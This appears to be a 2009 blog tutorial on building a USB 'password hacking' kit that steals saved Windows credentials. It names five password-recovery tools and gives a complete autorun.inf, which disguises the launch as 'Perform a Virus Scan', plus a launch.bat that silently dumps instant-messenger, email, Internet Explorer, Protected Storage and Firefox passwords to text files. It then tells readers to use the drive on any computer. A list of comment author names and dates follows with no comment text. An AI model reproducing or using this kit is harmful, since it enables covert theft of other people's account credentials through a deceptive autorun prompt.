As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox.
There exists many tools for recovering these passswords from their stored places. Using these tools and a USB pen-drive, you can create your own rootkit to sniff passwords from any computer. We need the following tools to create our rootkit:
MessenPass: Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.
Mail PassView: Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.
Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.
IE Passview: IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 – v6.0
Protected Storage PassView: Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more.
PasswordFox: PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed:
Record Index, Web Site, User Name, Password, User Name Field and Password Field.
Preparing Your USB Drive for Password Hacking:
Here is a step by step procedure to create the password hacking toolkit:
-
Download all the 5 tools, extract them and copy only the executable files (.exe files) onto your USB Pendrive.
ie: Copy the files – mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.
-
Create a new Notepad and write the following text into it:
[autorun] open=launch.bat
ACTION= Perform a Virus Scansave the Notepad and rename it from New Text Document.txt to autorun.inf. Now copy the autorun.inf file onto your USB pen-drive.
-
Create another Notepad and write the following text onto it:
start mspass.exe /stext mspass.txtstart mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt
Save the Notepad and rename it from New Text Document.txt to launch.bat. Copy the launch.bat file to your USB drive.
Now your rootkit is ready and you are all set to sniff the passwords. You can use this pen-drive on on any computer to sniff the stored passwords. Just follow these steps:
-
Insert the pen-drive and the auto-run window will pop-up. (This is because, we have created an auto-run pen-drive).
-
In the pop-up window, select the first option (Perform a Virus Scan).
-
Now all the password recovery tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.
-
Remove the pen-drive and you’ll see the stored passwords in the .TXT files.
This hack works on Windows 2000, XP, Vista and 7.















I am Srikanth Ramesh, a computer engineer from India.
127 Comments
Poppernut
February 8, 2009 at 8:02 AMPoppernut
February 8, 2009 at 8:18 AMSrikanth
February 8, 2009 at 11:22 AMRVM
February 8, 2009 at 10:21 AMSrikanth
February 8, 2009 at 11:11 AMsandy
February 8, 2009 at 12:53 PMShunmugha Sundaram
February 8, 2009 at 6:00 PMSrikanth
February 9, 2009 at 2:05 AMPoppernut
February 8, 2009 at 10:41 PMDavid
February 8, 2009 at 11:02 PMdude
February 8, 2009 at 11:11 PMSrikanth
February 9, 2009 at 2:00 AMme
February 9, 2009 at 3:56 AMLegend
February 9, 2009 at 4:59 PMsandy
February 9, 2009 at 9:15 PMLegend
February 10, 2009 at 4:48 AMans
February 11, 2009 at 6:32 PMSrikanth
February 12, 2009 at 9:29 AMRKO
February 11, 2009 at 10:22 PMVIVEK
February 11, 2009 at 10:49 PMSrikanth
February 12, 2009 at 9:19 AMAJ
February 12, 2009 at 8:07 AMSrikanth
February 12, 2009 at 9:17 AMAJ
February 12, 2009 at 8:07 AMsuperburger
February 12, 2009 at 9:26 PMsuperburger
February 12, 2009 at 9:28 PMSrikanth
February 13, 2009 at 10:24 PMRob
February 13, 2009 at 4:38 AMsuperburger
February 14, 2009 at 12:50 AMboss
February 14, 2009 at 11:43 AMSrikanth
February 14, 2009 at 10:56 PMboss
February 14, 2009 at 11:45 AMboss
February 14, 2009 at 11:50 AMBiswajit
February 17, 2009 at 4:00 PMCOMPUTER
February 17, 2009 at 5:52 PMSrikanth
February 17, 2009 at 11:42 PMZacharymatt5
February 18, 2009 at 7:27 AMCOMPUTER
February 18, 2009 at 6:59 PMSrikanth
February 18, 2009 at 9:12 PMChris
February 19, 2009 at 11:12 PMChris
February 19, 2009 at 11:49 PMchris
February 20, 2009 at 4:36 AMSrikanth
February 20, 2009 at 7:09 PMCOMPUTER
February 20, 2009 at 11:01 PMCOMPUTER
February 20, 2009 at 11:06 PMCrad
February 22, 2009 at 5:26 AMSrikanth
February 23, 2009 at 4:38 PMAJ
February 22, 2009 at 6:18 AMmouse
February 26, 2009 at 2:15 AMSrikanth
February 26, 2009 at 8:44 AMganesh
February 26, 2009 at 11:02 AMSrikanth
February 26, 2009 at 1:19 PMAbuJarad BaniHasan
February 26, 2009 at 3:06 PMganesh
February 27, 2009 at 10:02 AMTorooo
February 27, 2009 at 7:48 PMSrikanth
February 28, 2009 at 8:42 AMshan
March 5, 2009 at 6:59 PMshan
March 5, 2009 at 7:03 PMAmmy
March 11, 2009 at 8:12 PMparin
March 11, 2009 at 11:02 PMparin
March 11, 2009 at 11:07 PMSrikanth
March 13, 2009 at 2:36 PMTapas
March 12, 2009 at 12:35 PMhari rokz
March 12, 2009 at 3:45 PMSrikanth
March 13, 2009 at 2:33 PMhari rokz
March 12, 2009 at 9:15 PMparin
March 13, 2009 at 10:55 PMhari rokz
March 14, 2009 at 4:17 PMSrikanth
March 14, 2009 at 5:28 PMhari rokz
March 14, 2009 at 7:07 PMhari rokz
March 14, 2009 at 7:10 PMhari rokz
March 14, 2009 at 7:14 PMhari rokz
March 14, 2009 at 7:17 PMjohn
March 15, 2009 at 10:19 PMSrikanth
March 16, 2009 at 11:39 PMNobody's perfect, I am Nobody
March 16, 2009 at 6:45 PMsurya
March 18, 2009 at 11:24 PMvicky
March 22, 2009 at 4:08 PMSkrinklada
March 23, 2009 at 4:13 AMAyesha
March 28, 2009 at 5:38 PMSrikanth
March 29, 2009 at 9:22 AMshady
April 4, 2009 at 1:51 PMNarayanan
April 4, 2009 at 7:42 PMhrtpain
April 4, 2009 at 8:39 PMEUGEne
April 12, 2009 at 9:52 AMtoshi
April 21, 2009 at 8:49 PMSrikanth
April 22, 2009 at 10:57 PMPavel
April 22, 2009 at 12:57 AMSairam
April 24, 2009 at 12:06 PMSrikanth
April 24, 2009 at 12:37 PMdiamond
April 25, 2009 at 10:12 PMelitos
April 27, 2009 at 4:47 PMSudeep Acharya
May 4, 2009 at 10:41 PMAryan
May 5, 2009 at 6:07 PMSandeep
May 5, 2009 at 6:23 PMKhalid K.
May 8, 2009 at 6:17 AMKhalid K.
May 8, 2009 at 6:20 AMSrikanth
May 8, 2009 at 8:06 AMRabbani
May 9, 2009 at 1:12 AMjeetu
May 9, 2009 at 5:34 PMSrikanth
May 10, 2009 at 9:22 AMfrascop
May 14, 2009 at 9:44 PMSrikanth
May 15, 2009 at 7:00 AMmerck
May 17, 2009 at 1:15 AMcool
May 17, 2009 at 7:43 AMJeetu
May 18, 2009 at 12:53 PMPythaclassic
May 20, 2009 at 5:37 PMmajorpayne
May 20, 2009 at 5:43 PMcool
May 21, 2009 at 7:24 PMQaJ
May 24, 2009 at 11:55 PMQaJ
May 25, 2009 at 12:25 AMRobert
May 25, 2009 at 4:24 PMlokaj
June 2, 2009 at 1:46 PMlokaj
June 2, 2009 at 2:15 PMMichael
June 3, 2009 at 8:26 PMJD
June 6, 2009 at 10:17 AMSrikanth
June 7, 2009 at 6:15 AMVendetta
June 12, 2009 at 9:52 PMRajiv
June 13, 2009 at 3:59 PMVicky
June 16, 2009 at 4:48 PMVicky
June 16, 2009 at 4:50 PMHiren
June 19, 2009 at 11:29 PMsjb
June 22, 2009 at 8:19 AMhimanshu
July 4, 2009 at 2:25 PMSoulman
July 5, 2009 at 3:21 PMrocky
July 7, 2009 at 3:00 PMLimitationz
July 7, 2009 at 11:35 PM